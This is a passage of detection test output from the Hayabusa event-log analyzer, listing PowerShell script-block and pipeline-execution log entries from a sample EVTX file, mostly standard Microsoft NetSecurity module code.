'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.216 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.217 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.220 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.221 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.222 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.250 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 